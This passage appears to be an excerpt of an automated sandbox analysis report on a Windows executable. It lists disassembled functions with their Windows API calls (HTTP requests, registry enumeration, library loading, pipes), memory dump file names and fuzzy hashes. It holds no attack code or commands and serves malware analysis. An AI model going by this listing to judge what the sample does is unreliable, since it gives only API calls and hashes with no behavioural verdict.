                                    APIs
                                    • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009C027B
                                    • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009C02B1
                                    • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009C02C2
                                    • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009C0344
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorMode$AddressCreateInstanceProc
                                    • String ID: DllGetClassObject
                                    • API String ID: 753597075-1075368562
                                    • Opcode ID: 9e144845c18be2090e6d73f1550017400e617c252076da584bdefab428e27c48
                                    • Instruction ID: 0a02c2f47a44bb8743e2616b5575c41f3dbda136be6081f1c6a5ce4c960eead6
                                    • Opcode Fuzzy Hash: 9e144845c18be2090e6d73f1550017400e617c252076da584bdefab428e27c48
                                    • Instruction Fuzzy Hash: B4417E72A04208EFDB05CF94C884F9A7BB9EF84310F1484ADED099F256D7B5D945CBA1
                                    Function 009C5007 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 009C5075
                                    • GetMenuItemInfoW.USER32 ref: 009C5091
                                    • DeleteMenu.USER32(00000004,00000007,00000000), ref: 009C50D7
                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00A41708,00000000), ref: 009C5120
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Menu$Delete$InfoItem_memset
                                    • String ID: 0
                                    • API String ID: 1173514356-4108050209
                                    • Opcode ID: f7a19c2f03de811391f0145221dbb993f716a712e8431407534f3d9634104e09
                                    • Instruction ID: da390705def5c80c32618c53f5097d149a817644fca3a3a5c972c21ad5b80e58
                                    • Opcode Fuzzy Hash: f7a19c2f03de811391f0145221dbb993f716a712e8431407534f3d9634104e09
                                    • Instruction Fuzzy Hash: ED41A071A087019FD720DF24D888F6ABBE8AFC5324F194A1EF89597291D730E940CB63
                                    Function 009E0567 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                    Download Yara Rule
                                    APIs
                                    • CharLowerBuffW.USER32(?,?,?,?), ref: 009E0587
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: BuffCharLower
                                    • String ID: cdecl$none$stdcall$winapi
                                    • API String ID: 2358735015-567219261
                                    • Opcode ID: eab75251361c5822486c1145320790f0bd986f2499c591f406b8351722d5a0d8
                                    • Instruction ID: d50866a20d1f1ba40c34f0656c4867f81149a9fd0c27facd635c445e21583abd
                                    • Opcode Fuzzy Hash: eab75251361c5822486c1145320790f0bd986f2499c591f406b8351722d5a0d8
                                    • Instruction Fuzzy Hash: 2131D470500656AFCF00EF58C841AAEB3B8FF95314B108629F466A73D1DB71E955CB50
                                    Function 009BB80A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009BB88E
                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 009BB8A1
                                    • SendMessageW.USER32(?,00000189,?,00000000), ref: 009BB8D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 3850602802-1403004172
                                    • Opcode ID: 10696648069e8dc0ccbe373004e760caa7c7375c0350f574394f83c20a7b063f
                                    • Instruction ID: c3852ba70a887ce04ef290cb3837ce9bdded209eb0ac39b98f9cec1c8aa9510a
                                    • Opcode Fuzzy Hash: 10696648069e8dc0ccbe373004e760caa7c7375c0350f574394f83c20a7b063f
                                    • Instruction Fuzzy Hash: 7021F3B6900108BFDB14ABB4D986EFE77BDEF85364F104529F021A72E1DBB44D069760
                                    Function 009D43E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 85networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 009D4401
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009D4427
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 009D4457
                                    • InternetCloseHandle.WININET(00000000), ref: 009D449E
                                      • Part of subcall function 009D5052: GetLastError.KERNEL32(?,?,009D43CC,00000000,00000000,00000001), ref: 009D5067
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: HttpInternet$CloseErrorHandleInfoLastOpenQueryRequestSend
                                    • String ID:
                                    • API String ID: 1951874230-3916222277
                                    • Opcode ID: f2b249215db9b9345804c7e6e4ad7f75e90cd64018bd61cedb60e422d6c0906f
                                    • Instruction ID: 2d1bae294b78ad341b04f7a5b4f274bc4f113eec7dfbe4fa142a34e8feb5dd27
                                    • Opcode Fuzzy Hash: f2b249215db9b9345804c7e6e4ad7f75e90cd64018bd61cedb60e422d6c0906f
                                    • Instruction Fuzzy Hash: 1D2180B2580208BFEB119F94CC85FBFB6ECEB88748F10C41BF109A2250DA748D469771
                                    Function 009E90E2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0099D1BA
                                      • Part of subcall function 0099D17C: GetStockObject.GDI32(00000011), ref: 0099D1CE
                                      • Part of subcall function 0099D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0099D1D8
                                    • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 009E915C
                                    • LoadLibraryW.KERNEL32(?), ref: 009E9163
                                    • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 009E9178
                                    • DestroyWindow.USER32(?), ref: 009E9180
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                    • String ID: SysAnimate32
                                    • API String ID: 4146253029-1011021900
                                    • Opcode ID: 0023c4bf8abc2cf9545722ec002fbe6bec0a740d72a41003177b1b4a428152e1
                                    • Instruction ID: 2a16ccfab4210ba2a3b7e2a05f4d5328a3d77432846187d832057a08c45280f7
                                    • Opcode Fuzzy Hash: 0023c4bf8abc2cf9545722ec002fbe6bec0a740d72a41003177b1b4a428152e1
                                    • Instruction Fuzzy Hash: C421A47120428ABBEF218FA6DC84FBB77ADFF99364F100618F91492190C772DC42A760
                                    Function 009C9568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(0000000C), ref: 009C9588
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009C95B9
                                    • GetStdHandle.KERNEL32(0000000C), ref: 009C95CB
                                    • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 009C9605
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    • Opcode ID: dc75d67f00d2e3a20cb3430b185e5f71054e9aec5843c05073debe7e5950b799
                                    • Instruction ID: feb62f8babcfe1a3d0dbb06ab212f26700117e313bcf3e3c4f995e7e1c273be6
                                    • Opcode Fuzzy Hash: dc75d67f00d2e3a20cb3430b185e5f71054e9aec5843c05073debe7e5950b799
                                    • Instruction Fuzzy Hash: F0215171900249ABEB21AF69DC09F9A77E8AF89724F204A1DFDA1D72D0D770D942CB11
                                    Function 009C9634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStdHandle.KERNEL32(000000F6), ref: 009C9653
                                    • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 009C9683
                                    • GetStdHandle.KERNEL32(000000F6), ref: 009C9694
                                    • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009C96CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: CreateHandle$FilePipe
                                    • String ID: nul
                                    • API String ID: 4209266947-2873401336
                                    • Opcode ID: 271ef5ad392d20f6b12c6fc3f2e3a72a5459ab17e323cfd77cde94441712b3e6
                                    • Instruction ID: 9870036bc950161b89c69216ea27fdf083ee5691a1c0bd16f8e476188c7dc1ca
                                    • Opcode Fuzzy Hash: 271ef5ad392d20f6b12c6fc3f2e3a72a5459ab17e323cfd77cde94441712b3e6
                                    • Instruction Fuzzy Hash: E4215371D002059BDB209F699D49F9AB7ECAF95734F200A1DF8A1D72D0D770D942CB52
                                    Function 009CDAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 009CDB0A
                                    • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 009CDB5E
                                    • __swprintf.LIBCMT ref: 009CDB77
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000,00A1DC00), ref: 009CDBB5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorMode$InformationVolume__swprintf
                                    • String ID: %lu
                                    • API String ID: 3164766367-685833217
                                    • Opcode ID: e41b8a13d9031bf158da785abf0b38543cd33bd9f84098290912d401965c9d80
                                    • Instruction ID: 1e040e915f589b73e7c5c4a1cfdea6e723b9fffac5eac91022cedbb5b628065f
                                    • Opcode Fuzzy Hash: e41b8a13d9031bf158da785abf0b38543cd33bd9f84098290912d401965c9d80
                                    • Instruction Fuzzy Hash: 26215375A00108AFCB10EFA5CD85EEEBBB8EF89704B104069F509D7351DB71EA41CB61
                                    Function 009BC9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009BC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 009BC84A
                                      • Part of subcall function 009BC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 009BC85D
                                      • Part of subcall function 009BC82D: GetCurrentThreadId.KERNEL32 ref: 009BC864
                                      • Part of subcall function 009BC82D: AttachThreadInput.USER32(00000000), ref: 009BC86B
                                    • GetFocus.USER32 ref: 009BCA05
                                      • Part of subcall function 009BC876: GetParent.USER32(?), ref: 009BC884
                                    • GetClassNameW.USER32(?,?,00000100), ref: 009BCA4E
                                    • EnumChildWindows.USER32(?,009BCAC4), ref: 009BCA76
                                    • __swprintf.LIBCMT ref: 009BCA90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                    • String ID: %s%d
                                    • API String ID: 3187004680-1110647743
                                    • Opcode ID: 671086def58174e445845a9b2f3e4f4766cdc0c3364c940e79097bb85facae13
                                    • Instruction ID: 4500958e826c662154741745d07cee27d9a1ea8fad191c5ebb08bcaf282dfc5e
                                    • Opcode Fuzzy Hash: 671086def58174e445845a9b2f3e4f4766cdc0c3364c940e79097bb85facae13
                                    • Instruction Fuzzy Hash: 291193B56002097BCF11FFA08D85FEA3B7DAF84724F008466FE08AA182DB709546DB70
                                    Function 009E1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                    Download Yara Rule
                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009E19F3
                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 009E1A26
                                    • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 009E1B49
                                    • CloseHandle.KERNEL32(?), ref: 009E1BBF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                    • String ID:
                                    • API String ID: 2364364464-0
                                    • Opcode ID: bef4c3d35702a298af4be6f2f49df4ef1cacaa860770b55c5a492108c858a98c
                                    • Instruction ID: 7cc95a040f29188889a63b682c097a109ee32ec306ef2e15587752cf3141fc97
                                    • Opcode Fuzzy Hash: bef4c3d35702a298af4be6f2f49df4ef1cacaa860770b55c5a492108c858a98c
                                    • Instruction Fuzzy Hash: 2E818371600205ABDF11EF65C886BADBBE5BF48720F148459F905AF382D7B4ED418B90
                                    Function 009EE062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 009EE1D5
                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 009EE20D
                                    • IsDlgButtonChecked.USER32(?,00000001), ref: 009EE248
                                    • GetWindowLongW.USER32(?,000000EC), ref: 009EE269
                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 009EE281
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: MessageSend$ButtonCheckedLongWindow
                                    • String ID:
                                    • API String ID: 3188977179-0
                                    • Opcode ID: 0f4ecbe36feb3a23ffd0363321b8619f62b170f1c3ccdeb0ba854e7f112355e3
                                    • Instruction ID: d5529e703e8525c5a1bd3707950c7c539b8b3c4bfa8f38185e21b568bc7d14eb
                                    • Opcode Fuzzy Hash: 0f4ecbe36feb3a23ffd0363321b8619f62b170f1c3ccdeb0ba854e7f112355e3
                                    • Instruction Fuzzy Hash: 4661B538A08284AFDB22DF55CC94FAAB7BEEF89300F044059F959973A1C775AD81CB11
                                    Function 009C1C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 009C1CB4
                                    • VariantClear.OLEAUT32(00000013), ref: 009C1D26
                                    • VariantClear.OLEAUT32(00000000), ref: 009C1D81
                                    • VariantClear.OLEAUT32(?), ref: 009C1DF8
                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009C1E26
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Variant$Clear$ChangeInitType
                                    • String ID:
                                    • API String ID: 4136290138-0
                                    • Opcode ID: d2af43232513f971be8c6ecc12a32d49f7cf7bf301128baf258d68dfc91f609e
                                    • Instruction ID: ea84f6df51e11a806963327a80d8e5e1a54b8f2869d33551fd063c020ba45a75
                                    • Opcode Fuzzy Hash: d2af43232513f971be8c6ecc12a32d49f7cf7bf301128baf258d68dfc91f609e
                                    • Instruction Fuzzy Hash: C55149B5A00209EFDB14CF58C880EAAB7B8FF4D314B158559E95ADB341D330EA52CFA5
                                    Function 009E0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0098936C: __swprintf.LIBCMT ref: 009893AB
                                      • Part of subcall function 0098936C: __itow.LIBCMT ref: 009893DF
                                    • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 009E06EE
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 009E077D
                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 009E079B
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 009E07E1
                                    • FreeLibrary.KERNEL32(00000000,00000004), ref: 009E07FB
                                      • Part of subcall function 0099E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,009CA574,?,?,00000000,00000008), ref: 0099E675
                                      • Part of subcall function 0099E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,009CA574,?,?,00000000,00000008), ref: 0099E699
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                    • String ID:
                                    • API String ID: 327935632-0
                                    • Opcode ID: 585277d7ffb14e53e83d403635b6b833e0f53f452524a4880e7aa2ed608fabc2
                                    • Instruction ID: 7ada7dd49eaf98b4d75661e7a3adadcfdf3cb313813a53b905267eb826c5b7d3
                                    • Opcode Fuzzy Hash: 585277d7ffb14e53e83d403635b6b833e0f53f452524a4880e7aa2ed608fabc2
                                    • Instruction Fuzzy Hash: 52514B75A00249DFCB01EFA8C885EADB7B5BF98310F04805AE915AB352DB75ED46CF90
                                    Function 009E2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009E2BB5,?,?), ref: 009E3C1D
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009E2EEF
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009E2F2E
                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 009E2F75
                                    • RegCloseKey.ADVAPI32(?,?), ref: 009E2FA1
                                    • RegCloseKey.ADVAPI32(00000000), ref: 009E2FAE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                    • String ID:
                                    • API String ID: 3740051246-0
                                    • Opcode ID: 8517052be045454cc5d1a7f35271f98e45e9f89ca4fe5afee5680bb55a50a45b
                                    • Instruction ID: b75f208ed463a3d5a14d4805f7dc4c259ac06b9de190efe0b53643e3e64b8aec
                                    • Opcode Fuzzy Hash: 8517052be045454cc5d1a7f35271f98e45e9f89ca4fe5afee5680bb55a50a45b
                                    • Instruction Fuzzy Hash: D3515972608244AFD705EFA5C891F6ABBF8BF88304F04881DF59697291DB70ED05CB52
                                    Function 009ECCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                    Download Yara Rule
                                    Memory Dump Source
